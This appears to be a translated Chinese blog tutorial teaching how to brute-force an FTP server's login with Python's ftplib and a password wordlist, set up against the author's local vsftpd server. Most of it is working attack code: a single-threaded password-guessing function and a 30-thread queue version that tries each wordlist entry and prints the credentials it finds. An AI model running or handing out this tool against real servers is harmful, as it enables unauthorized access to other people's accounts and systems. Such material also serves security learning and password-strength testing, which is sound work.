
Python如何暴力破解FTP服务器?在 Python 中的 ftplib 模块的帮助下,学习如何使用字典攻击(使用单词列表进行暴力破解)破解 FTP 服务器。
一个暴力攻击是由该提交许多密码进行猜测正确的希望的攻击。在本教程中,你将学习如何在 Python 中暴力破解 FTP 服务器。

pip3 install colorama

现在,为了演示目的,我在本地网络中的一台运行 Linux 的机器上设置了一个 FTP 服务器。更准确地说,我已经安装了vsftpd(非常安全的 FTP 守护进程),它是类 Unix 系统的 FTP 服务器,如果你也想这样做,这里是我用来启动和准备的命令:
root@rockikz:~# sudo apt-get update root@rockikz:~# sudo apt-get install vsftpd root@rockikz:~# sudo service vsftpd start

Python暴力破解FTP服务器示例 - 然后确保你有一些用户,并且在/etc/vsftpd.conf文件中设置了local_enable=YES配置。
import ftplib from colorama import Fore, init # for fancy colors, nothing else# init the console for colors (Windows) # init() # hostname or IP address of the FTP server host = "" # username of the FTP server, root as default for linux user = "test" # port of FTP, aka 21 port = 21

所以本地服务器位于192.168.1.113,我也创建了一个用户名"test",然后我们指定了 FTP 的端口,即21。
def is_correct(password): # initialize the FTP server object server = ftplib.FTP() print(f"[ !] Trying", password) try: # tries to connect to FTP server with a timeout of 5 server.connect(host, port, timeout=5) # login using the credentials (user & password) server.login(user, password) except ftplib.error_perm: # login failed, wrong credentials return False else: # correct credentials print(f"{Fore.GREEN}[ +] Found credentials:", password, Fore.RESET) return True

【如何用Python暴力破解FTP服务器(代码实现教程)】没什么特别的,我们使用ftplib.FTP()初始化 FTP 服务器对象,然后我们连接到该主机并尝试登录,这将在凭据不正确时引发异常,因此如果引发异常,我们将只返回False,否则为真。
我们将使用已知密码列表,随意使用任何密码,或者你可以使用 Crunch 生成你自己的自定义词表。但是,在本教程中,我们将使用包含大约5000 个密码的nmap 密码列表,如果你使用的是 Kali Linux,它位于"/usr/share/wordlists/nmap.lst",否则,请在此处获取。
# read the wordlist of passwords passwords = open("wordlist.txt").read().split("\n") print("[ +] Passwords to try:", len(passwords))

# iterate over passwords one by one # if the password is found, break out of the loop for password in passwords: if is_correct(password): break

现在这段代码没问题,但是速度很慢,它只使用一个线程来按顺序尝试对每个密码进行 FTP 连接。
相关:  如何在 Python 中制作子域扫描仪。
import ftplib from threading import Thread import queue from colorama import Fore, init # for fancy colors, nothing else# init the console for colors (for Windows) # init() # initialize the queue q = queue.Queue() # number of threads to spawn n_threads = 30 # hostname or IP address of the FTP server host = "" # username of the FTP server, root as default for linux user = "test" # port of FTP, aka 21 port = 21def connect_ftp(): global q while True: # get the password from the queue password = q.get() # initialize the FTP server object server = ftplib.FTP() print("[ !] Trying", password) try: # tries to connect to FTP server with a timeout of 5 server.connect(host, port, timeout=5) # login using the credentials (user & password) server.login(user, password) except ftplib.error_perm: # login failed, wrong credentials pass else: # correct credentials print(f"{Fore.GREEN}[ +] Found credentials: ") print(f"\tHost: {host}") print(f"\tUser: {user}") print(f"\tPassword: {password}{Fore.RESET}") # we found the password, let's clear the queue with q.mutex: q.queue.clear() q.all_tasks_done.notify_all() q.unfinished_tasks = 0 finally: # notify the queue that the task is completed for this password q.task_done()# read the wordlist of passwords passwords = open("wordlist.txt").read().split("\n") print("[ +] Passwords to try:", len(passwords)) # put all passwords to the queue for password in passwords: q.put(password) # create `n_threads` that runs that function for t in range(n_threads): thread = Thread(target=connect_ftp) # will end when the main thread end thread.daemon = True thread.start() # wait for the queue to be empty q.join()

我们还使用了  守护线程,因此这些线程将在主线程结束时结束。

如果你对暴力破解 SSH 服务器感兴趣,请前往本教程。
